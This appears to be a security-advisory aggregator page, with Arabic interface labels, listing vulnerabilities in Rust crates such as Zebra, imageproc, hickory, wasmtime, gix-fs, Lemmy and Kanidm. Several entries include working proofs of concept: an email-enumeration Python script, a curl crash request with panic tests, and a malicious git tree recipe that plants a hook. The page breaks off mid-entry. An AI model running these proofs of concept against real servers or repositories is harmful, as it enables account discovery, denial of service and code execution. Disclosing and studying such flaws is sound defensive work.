Zebra's block validator undercounts transparent signature operations against the 20000-sigop block limit (`MAX_BLOCK_SIGOPS`), allowing it to accept blocks that `zcashd` rejects with `bad-blk-sigops`. A miner who produces such a block can split the network: Zebra nodes follow the offending chain while `zcashd` nodes do not. Two distinct undercounts: #### A: Coinbase Hidden Legacy Sigops `zcashd`'s `GetLegacySigOpCount()` includes the coinbase input's `scriptSig`. Zebra's `Sigops` impl skipped the coinbase input entirely, so up to ~98 sigops (the 100-byte coinbase script length cap, less the height prefix) could be hidden inside the coinbase `scriptSig` without being charged against the block limit. #### B: Aggregate P2SH Sigops. `zcashd`'s `GetP2SHSigOpCount()` parses each P2SH input's redeem script with `accurate=true` and sums those sigops into the block-wide total via `ConnectBlock`. The check is per-block, not per-transaction, and the limit applies regardless of who mines the offending block — a miner just needs to include enough P2SH-spending transactions whose redeem scripts together exceed 20000 sigops. Zebra computed P2SH sigops only on the mempool-acceptance path (used for ZIP-317 weighting) and never accumulated them during block validation. A block whose aggregate redeem-script sigops exceed 20000 (e.g. 1334 P2SH spends × 15 sigops = 20010) would be accepted by Zebra and rejected by `zcashd`. ### Patches Fixed in this release: https://github.com/ZcashFoundation/zebra/releases/tag/v4.4.0. ### Workarounds None. Operators relying on Zebra for consensus should upgrade. ### Resources - `MAX_BLOCK_SIGOPS` constant inherited from Bitcoin via the Zcash protocol spec's §7.6 catch-all "Other rules inherited from Bitcoin", tracked for explicit documentation in [zcash/zips#568](https://github.com/zcash/zips/issues/568). - `zcashd` `GetLegacySigOpCount`: <https://github.com/zcash/zcash/blob/v6.11.0/src/main.cpp#L826-L836> - `zcashd` `GetP2SHSigOpCount`: <https://github.com/zcash/zcash/blob/v6.11.0/src/main.cpp#L840-L852> - `zcashd` `ConnectBlock` aggregates per-tx sigops and compares against `MAX_BLOCK_SIGOPS`.

الإصدارات المتأثرة

All versions < 4.4.0

نوع الثغرة

CWE-682 — CWE-682

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N

غير محدد
📦 imageproc 📌 All versions < 0.23.1 🖥️ نظام تشغيل 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 A bounds verification of a slice storage of a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of individual dimensions. This would erroneously cast *after* the multiplication and consequently fail to detect possible violations when ...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A bounds verification of a slice storage of a 2-dimensional matrix's coefficients (a kernel) would compare the total size against the product of individual dimensions. This would erroneously cast *after* the multiplication and consequently fail to detect possible violations when overflow occurs. Afterwards, the individual sizes were trusted to properly constrain coordinates within the matrix to indices valid for the underlying storage. With a crafted `Kernel` object, certain combinations of coordinates could then cause an out-of-bounds access in an `unsafe` function while fulfilling its documented preconditions. The kernel value could be passed to library functions that trusted the preconditions and then performed such reads.

الإصدارات المتأثرة

All versions < 0.23.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

غير محدد
📦 imageproc 📌 All versions < 0.23.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 A bounds check was performed in floating points before a cast to the index passed to an unchecked access function. This checked considered `NaN` cases improperly, causing them to succeed the check instead of failing it. The floating point coordinate is under caller control by pas...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A bounds check was performed in floating points before a cast to the index passed to an unchecked access function. This checked considered `NaN` cases improperly, causing them to succeed the check instead of failing it. The floating point coordinate is under caller control by passing a selected projection matrix. Carefully controlling the coordinates of an image with no data and one non-zero dimension provides an arbitrary read primitive in the first 32-bits of address space with a Bilinear sampling method. Using bicubic sampling can result in a read of a few bytes beyond an allocation. Other out-of-bounds reads may be possible.

الإصدارات المتأثرة

All versions < 0.23.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

غير محدد
📦 imageproc 📌 All versions < 0.24.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 A read of pixels was coded as modifying coordinates to lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and 'dimension - 1'. This would not protect against malicious inputs that could ...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

A read of pixels was coded as modifying coordinates to lie within the image bounds. It would calculate a coordinate by adding a constant to an input and taking the minimum of the resulting coordinate and 'dimension - 1'. This would not protect against malicious inputs that could overflow the addition. Following the tricked bounds check, the image could then be sampled at multiple differently calculated coordinates that exceeded the bounds.

الإصدارات المتأثرة

All versions < 0.24.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

غير محدد
📦 hickory-proto 📌 All versions < 0.26.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 During message encoding, `hickory-proto`'s `BinEncoder` stores pointers to labels that are candidates for name compression in a `Vec<(usize, Vec<u8>)>`. The name compression logic then searches for matches with a linear scan. A malicious message with many records can both introd...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

During message encoding, `hickory-proto`'s `BinEncoder` stores pointers to labels that are candidates for name compression in a `Vec<(usize, Vec<u8>)>`. The name compression logic then searches for matches with a linear scan. A malicious message with many records can both introduce many candidate labels, and invoke this linear scan many times. This can amplify CPU exhaustion in DoS attacks. This is similar to [CVE-2024-8508](https://www.nlnetlabs.nl/downloads/unbound/CVE-2024-8508.txt). ### Reporter Qifan Zhang, Palo Alto Networks

الإصدارات المتأثرة

All versions < 0.26.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

عالية
📦 hickory-proto 📌 All versions < alpha.3 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل
💬 The NSEC3 closest-encloser proof validation in `hickory-proto`'s (0.25.0-alpha.3 ... 0.25.2) and `hickory-net`'s (0.26.0-alpha.1 .. 0.26.0) `DnssecDnsHandle` walks from the QNAME up to the SOA owner name, building a list of candidate encloser names. The iterator used assumes the...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

The NSEC3 closest-encloser proof validation in `hickory-proto`'s (0.25.0-alpha.3 ... 0.25.2) and `hickory-net`'s (0.26.0-alpha.1 .. 0.26.0) `DnssecDnsHandle` walks from the QNAME up to the SOA owner name, building a list of candidate encloser names. The iterator used assumes the QNAME is a descendant of the SOA owner, terminating only when the current candidate equals the SOA name. When the SOA in a response's authority section is not an ancestor of the QNAME, the loop stalls at the DNS root and never terminates, repeatedly calling `Name::base_name()` and pushing newly allocated `Name` and hashed-name entries into the candidate `Vec`. The bug is reachable by any caller of `DnssecDnsHandle`, including the resolver, recursor, and client, when built with the `dnssec-ring` or `dnssec-aws-lc-rs` feature and configured to perform DNSSEC validation. It is triggered while validating a NoData or NXDomain response whose authority section contains an SOA record from a zone other than an ancestor of the QNAME, on a code path that requires NSEC3 closest-encloser proof. In practice this can be reached through an insecure CNAME chain that crosses zone boundaries into a DNSSEC-signed zone returning NoData, but the minimum condition is just a mismatched SOA owner on a response requiring NSEC3 validation. A `debug_assert_ne!(name, Name::root())` guards the loop body, so debug builds abort with a panic on the first iteration past the root. Release builds compile the assertion out and run the loop unbounded, allocating until the process exhausts available memory. A reachable upstream attacker who can return such a response can therefore crash a debug build or exhaust memory on a release build, for the affected configurations. The affected code was migrated from `hickory-proto` to `hickory-net` as part of the 0.26.0 release. Hickory DNS recommends that all affected users update to `hickory-net` 0.26.1 for the fix. ### Reporter David Cook, ISRG

الإصدارات المتأثرة

All versions < alpha.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

عالية
📦 rust-zserio 📌 All versions < 0.5.4 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact When deserializing arrays, strings or bytes (blob) types zserio first reads the size of the variable, and then allocates sufficient memory to load data. Since the size is always trusted this can be abused by creating a data file with a large size value, causing the zs...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact When deserializing arrays, strings or bytes (blob) types zserio first reads the size of the variable, and then allocates sufficient memory to load data. Since the size is always trusted this can be abused by creating a data file with a large size value, causing the zserio runtime to allocate large amounts of memory. ### Patches Please cherry-pick [57f5fb](https://github.com/Danaozhong/rust-zserio/commit/57f5fb4a2a8611d58dbcc1a9221349206dd99c3c). ### Workarounds - Do not accept `zserio`-encoded messages from non-trusted sources. - Allocate a maximum heap amount to `rust-zerio` to avoid impacting other applications.

الإصدارات المتأثرة

All versions < 0.5.4

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

غير محدد
📦 wasmtime 📌 30.0.0 → 36.0.8 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact Wasmtime's allocation logic for a WebAssembly table contained checked arithmetic which panicked on overflow. This overflow is possible to trigger, and thus panic, when a table with an extremely large size is allocated. This is possible with the WebAssembly memory64 pr...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact Wasmtime's allocation logic for a WebAssembly table contained checked arithmetic which panicked on overflow. This overflow is possible to trigger, and thus panic, when a table with an extremely large size is allocated. This is possible with the WebAssembly memory64 proposal where tables can have sizes in the 64-bit range as opposed to the previous 32-bit range which would not overflow. The panic happens when attempting to create a very large table, such as when instantiating a WebAssembly module or component. This bug does not affect the pooling allocator which limits tables sizes to much less than the required amount to trigger the overflow. This bug is only present for the on-demand instance allocator, which is Wasmtime's default allocator. This bug also requires the `memory64` WebAssembly feature to be enabled, which is on-by-default. Panicking in the host process is considered a denial-of-service vector for Wasmtime. ### Patches Wasmtime 36.0.8, 43.0.2, and 44.0.1 have all been released which fixes this issue. ### Workarounds Embeddings can switch to using the pooling allocator to work around this issue, or the `memory64` WebAssembly proposal can be disabled. Otherwise there is no workaround and users are recommended to upgrade.

الإصدارات المتأثرة

30.0.0 → 36.0.8

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

منخفضة
📦 diesel-async 📌 All versions < 0.9.0 🗃️ قاعدة بيانات 🦀 مكتبة Rust crates.io 🎯 محلي ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary diesel-async exposes uninitialized stack padding to safe code on every read of a MySQL `DATE`, `TIME`, `DATETIME`, or `TIMESTAMP` column. Reading that buffer is undefined behavior, and the leaked bytes can contain stale heap/stack contents, so this is both a soundnes...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary diesel-async exposes uninitialized stack padding to safe code on every read of a MySQL `DATE`, `TIME`, `DATETIME`, or `TIMESTAMP` column. Reading that buffer is undefined behavior, and the leaked bytes can contain stale heap/stack contents, so this is both a soundness bug and a potential information-disclosure vector. ### Details In `diesel-async/src/mysql/row.rs` (lines 65-103), `MysqlRow::get` builds a `MysqlTime` from the parsed `mysql_async::Value` and then fabricates the byte buffer that downstream `FromSql` impls expect like this: ```rust let date = MysqlTime::new(/* fields from Value::Date / Value::Time */); let buffer = unsafe { let ptr = &date as *const MysqlTime as *const u8; let slice = std::slice::from_raw_parts(ptr, std::mem::size_of::<MysqlTime>()); slice.to_vec() }; ``` `MysqlTime` is `#[repr(C)]` with 3 bytes of padding after `bool neg` (Linux x86_64, offsets 0x21..0x23). The literal construction leaves that padding uninitialized, and `to_vec()` carries it into a `Vec<u8>` that becomes the `MysqlValue`'s backing buffer, reachable from safe code via `MysqlValue::as_bytes() -> &[u8]`. `diesel` itself avoids this by going through `MaybeUninit::<MysqlTime>::zeroed()` + `ptr::copy_nonoverlapping` (see `diesel/src/mysql/value.rs:43-94`); the same pattern would fix this. Alternatively, write the bytes diesel's `FromSql` reads without round-tripping through a `MysqlTime` value. ### PoC `Cargo.toml`: ```toml [dependencies] diesel = { version = "~2.3.0", default-features = false, features = ["mysql_backend"] } diesel-async = { version = "=0.8.0", features = ["mysql"] } mysql_common = { version = "0.35", default-features = false } ``` `src/main.rs`: ```rust use diesel::row::{Field, Row}; use diesel_async::{AsyncConnectionCore, AsyncMysqlConnection}; use mysql_common::{constants::ColumnType, packets::Column, prelude::FromRow, value::Value}; type MysqlRow = <AsyncMysqlConnection as AsyncConnectionCore>::Row<'static, 'static>; fn main() { let cols = std::sync::Arc::from([Column::new(ColumnType::MYSQL_TYPE_DATE)]); let raw = mysql_common::row::new_row(vec![Value::Date(2024, 1, 1, 0, 0, 0, 0)], cols); let row: MysqlRow = FromRow::from_row(raw); let field = row.get(0).unwrap(); let bytes = field.value().unwrap().as_bytes(); let _: u64 = bytes.iter().map(|&b| b as u64).sum(); // UB: hits padding } ``` Miri output: ``` error: Undefined Behavior: reading memory at alloc844[0x21..0x22], but memory is uninitialized at [0x21..0x22], and this operation requires initialized memory --> src/main.rs:14:37 | 14 | let _: u64 = bytes.iter().map(|&b| b as u64).sum(); // UB: hits padding | ^ Undefined Behavior occurred here | = help: this indicates a bug in the program: it performed an invalid operation, and caused Undefined Behavior = help: see https://doc.rust-lang.org/nightly/reference/behavior-considered-undefined.html for further information = note: stack backtrace: 0: main::{closure#0} at src/main.rs:14:37: 14:38 1: std::iter::adapters::map::map_fold::<&u8, u64, u64, {closure@src/main.rs:14:35: 14:39}, {closure@<u64 as std::iter::Sum>::sum<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>::{closure#0}}>::{closure#0} at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/adapters/map.rs:88:28: 88:34 2: <std::slice::Iter<'_, u8> as std::iter::Iterator>::fold::<u64, {closure@std::iter::adapters::map::map_fold<&u8, u64, u64, {closure@src/main.rs:14:35: 14:39}, {closure@<u64 as std::iter::Sum>::sum<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>::{closure#0}}>::{closure#0}}> at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/slice/iter/macros.rs:279:27: 279:85 3: <std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}> as std::iter::Iterator>::fold::<u64, {closure@<u64 as std::iter::Sum>::sum<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>>::{closure#0}}> at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/adapters/map.rs:128:9: 128:50 4: <u64 as std::iter::Sum>::sum::<std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}>> at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/traits/accum.rs:52:17: 56:18 5: <std::iter::Map<std::slice::Iter<'_, u8>, {closure@src/main.rs:14:35: 14:39}> as std::iter::Iterator>::sum::<u64> at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/traits/iterator.rs:3676:9: 3676:23 6: main at src/main.rs:14:18: 14:55 Uninitialized memory occurred at alloc844[0x21..0x22], in this allocation: alloc844 (Rust heap, size: 48, align: 1) { 0x00 │ e8 07 00 00 01 00 00 00 01 00 00 00 00 00 00 00 │ ................ 0x10 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................ 0x20 │ 00 __ __ __ 01 00 00 00 00 00 00 00 __ __ __ __ │ .░░░........░░░░ } ``` ### Impact Soundness bug in safe API surface of `diesel-async`'s MySQL backend. Affects every user of `AsyncMysqlConnection` whose queries return a temporal column. AI disclosure: this issue was found via Claude Code running Claude Opus 4.7.

الإصدارات المتأثرة

All versions < 0.9.0

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:P

عالية
📦 gix-fs 📌 All versions < 0.21.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 محلي ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary A malicious tree can be constructed that will, when checked out with gitoxide, permit writing an attacker-controlled symlink into any existing directory the user has write access to. ### Details During checkout, all symlink index entries are deferred and created af...
📅 2026-05-07 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary A malicious tree can be constructed that will, when checked out with gitoxide, permit writing an attacker-controlled symlink into any existing directory the user has write access to. ### Details During checkout, all symlink index entries are deferred and created after regular files using a single shared `gix_worktree::Stack`. Internally, this uses a `gix_fs::Stack`. `gix_fs::Stack::make_relative_path_current()` caches validated path prefixes: when the previously-processed leaf component exactly matches the leading component(s) of the next path, the leaf-to-directory transition at `gix-fs/src/stack.rs:195-197` invokes only `delegate.push_directory()`, never `delegate.push()`. In `gix_worktree::stack::delegate::StackDelegate`, when the state member is `State::CreateDirectoryAndAttributesStack`, `Attributes::push_directory()` only loads attributes (from the ODB, in the clone case), and does not perform any other checks. The on-disk `symlink_metadata()` check and unlink-on-collision live in `StackDelegate::push()`'s invocation of `create_leading_directory()`, which is therefore bypassed for the cached prefix. The final symlink is created with plain `std::os::unix::fs::symlink`, which follows symlinks in parent directories. Therefore, it's possible to provide a tree with duplicate symlink and directory entries that exploits this. If a tree is constructed with: 1. A `120000` (symlink) entry `a` that points to `.git/hooks`. 2. A `040000` (directory) entry `a` with a subtree that contains a symlink from `post-checkout` to `../../payload`. 3. A `100755` (executable file) entry `payload`. This is converted by `gix_index::State::from_tree()` into index entries `["a" (SYMLINK), "a/post-checkout" (SYMLINK)]`. Then, during the delayed symlink phase: 1. `a` is created as a symlink to e.g. `.git/hooks`. 2. When processing `a/post-checkout`, the `a` prefix is reused from the just-processed leaf entry without re-running the intermediate-directory check, after which… 3. `symlink(target, "<wt>/a/post-checkout")` resolves through the just-created symlink to write `.git/hooks/post-checkout`. Although this example uses `.git/hooks` for simplicity, there's no actual requirement to write within the repo checkout. This can be fairly easily chained into code execution by writing to something that is known to be executed — for example, by writing to `.git/hooks/post-checkout` if the attacker knows that a hook-aware Git implementation will be used later, or by writing to something like `~/.local/bin`. ### PoC Attached is [build-bad-repo.sh](https://github.com/user-attachments/files/27223800/build-bad-repo.sh), which builds a repo with the aforementioned tree structure. Cloning it with `gix` will set up the malicious `.git/hooks/post-checkout`, at which point anything that normally invokes the `post-checkout` hook will result in its execution, such as `git checkout -b new-branch`. ### Impact Arbitrary symlink creation into any existing directory the user can write to. ### Disclosure This vulnerability was found by AI (specifically, Claude Mythos) as part of [Project Glasswing](https://www.anthropic.com/glasswing). This advisory was written and verified by a human.

الإصدارات المتأثرة

All versions < 0.21.1

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

غير محدد
📦 lemmy_api 📌 All versions < 0 📧 بريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل
💬 ## Summary The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to `/api/v4/account/auth/resend_verification_email` and distinguish accounts from misse...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to `/api/v4/account/auth/resend_verification_email` and distinguish accounts from misses. ## Details `resend_verification_email()` looks up the submitted address and returns the lookup error to the caller: ```rust let local_user_view = LocalUserView::find_by_email(&mut context.pool(), &email).await?; check_local_user_valid(&local_user_view)?; ``` The password reset endpoint already uses a safer pattern. It discards lookup errors and returns success, which prevents the same account-discovery channel. ## Proof of Concept The following script creates one user and probes that address plus a missing address. ```python import requests, random, string BASE = "http://127.0.0.1:8536/api/v4" # change to the target Lemmy URL ADMIN_USER = "lemmy" ADMIN_PASS = "lemmylemmy" PASSWORD = "Password123456!" def post(path, **body): return requests.post(BASE + path, json=body) suffix = "enum" + "".join(random.choice(string.ascii_lowercase) for _ in range(6)) admin = post("/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"] requests.put(BASE + "/site", headers={"Authorization": "Bearer " + admin}, json={"registration_mode": "open", "email_verification_required": False}) email = "alice" + suffix + "@example.test" post("/account/auth/register", username="alice" + suffix, password=PASSWORD, password_verify=PASSWORD, email=email).raise_for_status() for candidate in [email, "missing" + suffix + "@example.test"]: r = post("/account/auth/resend_verification_email", email=candidate) print(candidate, "HTTP", r.status_code, r.text[:300]) ``` Output: ```text alicepoceudtpf@example.test HTTP 200 {"success":true} missingpoceudtpf@example.test HTTP 404 {"error":"not_found","cause":"Record not found"} ``` ## Impact A malicious third party can enumerate registered email addresses without authentication. The endpoint uses the registration rate limit bucket, not an endpoint-specific anti-enumeration limit, so the attacker can automate probes across candidate address lists. The response also distinguishes missing accounts from banned or deleted accounts because `check_local_user_valid()` returns separate error types. ## Recommended Fix Use the password-reset pattern for resend verification. Move the lookup and email-send work into a helper, ignore helper errors in the handler, and always return `{"success": true}` for syntactically valid input. --- *Found by [aisafe.io](https://aisafe.io)*

الإصدارات المتأثرة

All versions < 0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

عالية
📦 ldap3_proto 📌 All versions < 0.7.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact LDAP queries are not validated for depth, which can cause the parser (both PEG and ASN) to exhaust the stack. This *may* cause a denial of service in applications that process queries. ### Workarounds N/A ### Resources Related to GHSA-r5fr-9gmv-jggh
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact LDAP queries are not validated for depth, which can cause the parser (both PEG and ASN) to exhaust the stack. This *may* cause a denial of service in applications that process queries. ### Workarounds N/A ### Resources Related to GHSA-r5fr-9gmv-jggh

الإصدارات المتأثرة

All versions < 0.7.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

غير محدد
📦 kanidmd_lib 📌 All versions < 1.9.3 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary The `POST /v1/domain/_image` and `POST /v1/oauth2/{rs_name}/_image` handlers call `validate_image()` on the uploaded body **before** the ACL check that restricts image upload to admins. Any bug in an image validator is therefore reachable by an unauthenticated remote ...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary The `POST /v1/domain/_image` and `POST /v1/oauth2/{rs_name}/_image` handlers call `validate_image()` on the uploaded body **before** the ACL check that restricts image upload to admins. Any bug in an image validator is therefore reachable by an unauthenticated remote client rather than being admin-gated. One such bug exists today: `png_has_trailer()` panics on inputs shorter than 8 bytes, or whose first chunk-length field is near `u32::MAX`. **On a default build this has no server-wide impact.** The panic unwinds only the requester's own tokio task; the server process survives, no shared state is poisoned, and other connections are unaffected. This was reported privately rather than as a public issue because (a) the project previously treated an admin-triggered thread crash of identical impact as security-relevant (e51d0dee4), and this is reachable by a broader population; and (b) a downstream build with `panic = "abort"` would upgrade it to an unauthenticated process-crash DoS. ### Details #### Validate-before-authorize ordering Both handlers parse and validate attacker-controlled bytes before checking whether the caller is permitted to upload at all: - `server/core/src/https/v1_domain.rs:118` — `image.validate_image()` runs; `handle_image_update(client_auth_info, …)` (the ACL check) is at line 129. - `server/core/src/https/v1_oauth2.rs:550` — same ordering. The `VerifiedClientInformation` extractor (`server/core/src/https/extractors/mod.rs:18-90`) always returns `Ok` — it builds a `ClientAuthInfo` from whatever credentials are present (including none) and does not reject anonymous callers. Authorization is deferred to `handle_image_update()`, which is never reached if the validator panics or errors first. #### PNG validator panic (demonstrator) `validate_image()` (`server/lib/src/valueset/image/mod.rs:98`) checks only a 256 KiB maximum size, not a minimum, before dispatching to the format-specific validator. **Short input** — `server/lib/src/valueset/image/png.rs:73-76`: ```rust pub fn png_has_trailer(contents: &Vec<u8>) -> Result<bool, ImageValidationError> { let buf = contents.as_slice(); let (magic, buf) = buf.split_at(PNG_PRELUDE.len()); // 8; panics if len < 8 ``` **Chunk-length overflow** — `server/lib/src/valueset/image/png.rs:46,53`: ```rust if buf.len() < (length + 4) as usize { // length: u32; wraps before the usize cast ... } let (_, buf) = buf.split_at(length as usize); // panics for length ≈ u32::MAX ``` In a release build `0xFFFF_FFFC + 4` wraps to `0`, the guard passes, and `split_at` panics. ### PoC ```sh printf '\x89PNG' > /tmp/short.png curl -sk https://$KANIDM_HOST/v1/domain/_image \ -F 'image=@/tmp/short.png;type=image/png;filename=x.png' # → connection reset / empty reply; server process remains up ``` Unit-test confirmation (`cargo test -p kanidmd_lib --lib`): ```rust #[test] fn audit_png_short_input_panics() { let short = vec![0x89u8, 0x50, 0x4e, 0x47]; assert!(std::panic::catch_unwind(|| png_has_trailer(&short)).is_err()); } #[test] fn audit_png_chunk_length_overflow_panics() { let mut data = vec![0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]; data.extend_from_slice(&[0xFF, 0xFF, 0xFF, 0xFD]); data.extend_from_slice(b"IHDR"); data.extend_from_slice(&[0u8; 8]); assert!(std::panic::catch_unwind(|| png_has_trailer(&data)).is_err()); } ``` Both tests pass (i.e. both inputs panic). ### Impact The only party affected is the requester, whose own connection is dropped. Repeating the request has no cumulative effect beyond ordinary request load. On the upstream build: - Each connection runs in its own `tokio::task::spawn` (`server/core/src/https/mod.rs:481`); the accept loop continues after a task panic. - No `panic = "abort"` in any workspace `[profile.*]`. - No `Mutex`/`RwLock` held across the call site; nothing is poisoned. - The panic occurs before any write actor is messaged; no DB or replication state is touched. **Residual risk:** a downstream packager that sets `panic = "abort"` (or links code that installs an abort handler) would see a full unauthenticated process crash. (No such packager is known) **Affected:** v1.1.0-rc.15 (introduced in e7f594a1c, #2112) through `master` @ edf50b9da.

الإصدارات المتأثرة

All versions < 1.9.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

عالية
📦 scim_proto 📌 All versions < 1.9.3 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary A single unauthenticated `GET` to any `/scim/v1/...` endpoint with a `?filter=` query string of a few thousand nested parentheses (≈ 4–12 KB) drives the recursive-descent PEG parser past the worker thread's stack guard page. Rust responds to stack overflow with `std:...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary A single unauthenticated `GET` to any `/scim/v1/...` endpoint with a `?filter=` query string of a few thousand nested parentheses (≈ 4–12 KB) drives the recursive-descent PEG parser past the worker thread's stack guard page. Rust responds to stack overflow with `std::process::abort()` — the entire `kanidmd` process exits. The parse runs inside axum's `Query<ScimEntryGetQuery>` extractor, before any handler body and therefore before any ACL check. ### Details The SCIM filter grammar recurses on `(` and `not (` with no depth bound. **`proto/src/scim_v1/mod.rs:263-433`** — `peg::parser! { grammar scimfilter() ... }`: ```rust // line 281 "not" separator()+ "(" e:parse() ")" { ScimFilter::Not(Box::new(e)) } // line 293 "(" e:parse() ")" { e } ``` Both rules re-enter `parse()` without a depth counter. **`proto/src/scim_v1/mod.rs:442-447`** — `impl FromStr for ScimFilter` calls `scimfilter::parse(input)` directly on the raw string with no length or depth pre-check. **`proto/src/scim_v1/mod.rs:80-81`** — `ScimEntryGetQuery.filter` is `#[serde_as(as = "Option<DisplayFromStr>")]`, so deserialising the query struct invokes `ScimFilter::from_str` on attacker bytes. **Unauthenticated reachability** — nine handlers in `server/core/src/https/v1_scim.rs` (route table at lines 865-1029) take `Query<ScimEntryGetQuery>` as an argument: `/scim/v1/Entry`, `/scim/v1/Entry/{id}`, `/scim/v1/Person/{id}`, `/scim/v1/Application`, `/scim/v1/Application/{id}`, `/scim/v1/Class`, `/scim/v1/Attribute`, `/scim/v1/Message`, `/scim/v1/Message/{id}`. The SCIM router is merged unconditionally for every server role (`server/core/src/https/mod.rs:312`). Axum extracts handler arguments before the handler body runs. The preceding `VerifiedClientInformation` extractor (`server/core/src/https/extractors/mod.rs:16-91`) always returns `Ok` (line 89) regardless of credentials; authorization is deferred to the handler body, which is never reached. The existing semantic depth limit (`DEFAULT_LIMIT_FILTER_DEPTH_MAX = 12`, `server/lib/src/constants/mod.rs:212`) is enforced in `Filter::from_scim_ro` (`server/lib/src/filter.rs:786`) **after** the PEG parse has already produced an AST, so it cannot prevent the parser itself from blowing the stack. The production daemon (`server/daemon/src/main.rs:735-744`) uses `new_multi_thread()` with default 2 MiB worker stacks; hyper's 